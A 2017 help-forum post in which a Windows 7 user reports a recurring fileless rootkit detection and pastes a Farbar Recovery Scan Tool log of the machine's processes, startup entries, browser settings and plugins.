Computer infected with Rootkit.fileless.MtGen


47 replies to this topic

#1 krtate

Posted 08 April 2017 - 01:59 PM

I ran Malwarebytes and quarantined, deleted, ran the scan again and it is still there. Thank you for any assistance you can offer.

Attached is the Malwarebytes log.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-03-2017
Ran by KEKLR (administrator) on KEKLR-PC (08-04-2017 14:10:21)
Running from C:\Users\KEKLR\Downloads
Loaded Profiles: KEKLR (Available Profiles: KEKLR)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe
(LSI Corporation) C:\Program Files\LSI SoftModem\agr64svc.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\Live TV\TVAgent.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIKEE.EXE
( Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QLBCtrl.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\FAX Utility\FUFAXRCV.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\Receiver\Receiver.exe
() C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\FAX Utility\FUFAXSTM.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\FXSSVC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
(Malwarebytes) C:\Program Files (x86)\MALWAREBYTES ANTI-MALWARE\mbam.exe
() C:\Program Files (x86)\Hewlett-Packard\Shared\HpqToaster.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\SelfServicePlugin\SelfServicePlugin.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\SelfServicePlugin\SelfService.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil64_25_0_0_127_ActiveX.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Farbar) C:\Users\KEKLR\Downloads\FRST64 (1).exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610872 2009-07-21] ()
HKLM\...\Run: [IAAnotif] => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-06-04] (Intel Corporation)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [487424 2010-03-23] (IDT, Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [HPCam_Menu] => c:\Program Files (x86)\Hewlett-Packard\Media\Webcam\MUITransfer\MUIStartMenu.exe [218408 2009-02-25] (CyberLink Corp.)
HKLM-x32\...\Run: [QlbCtrl.exe] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [323640 2009-11-24] ( Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [UpdatePRCShortCut] => C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM-x32\...\Run: [WirelessAssistant] => C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [498744 2009-07-23] (Hewlett-Packard)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [518496 2015-06-24] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [231776 2015-06-24] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [FUFAXRCV] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe [653352 2017-02-16] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [FUFAXSTM] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe [862248 2017-02-16] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1087184 2016-01-20] (SEIKO EPSON CORPORATION)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [HPADVISOR] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe [1689144 2010-06-30] (Hewlett-Packard)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [LightScribe Control Panel] => C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe [2363392 2009-11-20] (Hewlett-Packard Company)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-01-16] (Google Inc.)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [721504 2015-09-02] (Microsoft Corporation)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATIKEE.EXE [298560 2013-09-12] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Policies\Explorer: [NoSaveSettings] 00000000
HKU\S-1-5-18\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [919296 2015-06-03] (Kaspersky Lab ZAO)
HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2**
Startup: C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk [2017-04-08]
ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 204.186.80.229 204.186.110.114 204.186.0.180
Tcpip\..\Interfaces\{AFE4A105-7E52-4CB0-9CAE-18A1828C5361}: [DhcpNameServer] 204.186.80.229 204.186.110.114 204.186.0.180

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL =
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} URL = hxxp://search.avg.com/route/?d=4b3d2cf0&i=23&tp=chrome&q={searchTerms}&lng={language}&ychte=us&nt=1
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-05] (Microsoft Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\URLREDIR.DLL [2017-03-05] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-05] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-07-21] (HP Inc.)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-03-05] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll [2015-04-25] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-05-02] (Google Inc.)
BHO-x32: hpBHO Class -> {ABD3B5E1-B268-407B-A150-2641DAB8D898} -> C:\Program Files (x86)\Common Files\Homepage Protection\HomepageProtection.dll [2009-06-08] (AOL Products)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\URLREDIR.DLL [2017-03-05] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-03-05] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll [2015-04-25] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} -  No File
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-05-02] (Google Inc.)
Toolbar: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} hxxp://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: HKLM-x32 {3860DD98-0549-4D50-AA72-5D17D200EE10} hxxp://cdn.scan.onecare.live.com/resource/download/scanner/en-us/wlscctrl2.cab
DPF: HKLM-x32 {3D3B42C2-11BF-4732-A304-A01384B70D68} hxxp://picasaweb.google.com/s/v/60.08/uploader2.cab
DPF: HKLM-x32 {4B54A9DE-EF1C-4EBE-A328-7C28EA3B433A} hxxp://quickscan.bitdefender.com/qsax/qsax.cab
DPF: HKLM-x32 {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} hxxp://download.bitdefender.com/resources/scanner/sources/en/scan8/oscan8.cab
DPF: HKLM-x32 {644E432F-49D3-41A1-8DD5-E099162EEEC5} hxxp://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {9191F686-7F0A-441D-8A98-2FE3AC1BD913} hxxp://acs.pandasoftware.com/activescan/cabs/as2stubie.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler-x32: lbxfile - {56831180-F115-11d2-B6AA-00104B2B9943} - C:\Program Files (x86)\Libronix DLS\System\FileProt.dll [2002-08-05] (Libronix Corporation)
Handler-x32: lbxres - {24508F1B-9E94-40EE-9759-9AF5795ADF52} - C:\Program Files (x86)\Libronix DLS\System\ResProt.dll [2002-08-05] (Libronix Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)

FireFox:
========
FF ProfilePath: C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default [2017-04-08]
FF Homepage: Mozilla\Firefox\Profiles\rtqcgnqa.default -> hxxps://login.yahoo.com/config/login_verify2?&.src=ym&rl=1
FF Extension: (HP Detect) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\Extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2} [2012-12-08] [not signed]
FF Extension: (Site Deployment Checker) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\features\{61e6cfb8-2aca-4f3a-92fd-7275f8f7e100}\deployment-checker@mozilla.org.xpi [2017-04-03]
FF Extension: (Disable Prefetch) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\features\{61e6cfb8-2aca-4f3a-92fd-7275f8f7e100}\disable-prefetch@mozilla.org.xpi [2017-04-03]
FF Extension: (Site Deployment Checker) - C:\Program Files (x86)\Mozilla Firefox\browser\features\deployment-checker@mozilla.org.xpi [2017-04-01] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-03-14] ()
FF Plugin: @java.com/DTPlugin,version=10.6.2 -> C:\Windows\system32\npDeployJava1.dll [2012-08-29] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-03-14] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-06-24] (Citrix Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npDeployJava1.dll [2015-04-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll [2015-04-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-03-05] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-05] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @pandasecurity.com/activescan -> C:\Program Files (x86)\Panda Security\ActiveScan 2.0\npwrapper.dll [2010-07-27] (Panda Security, S.L.)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-17] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-02-17] (Adobe Systems Inc.)
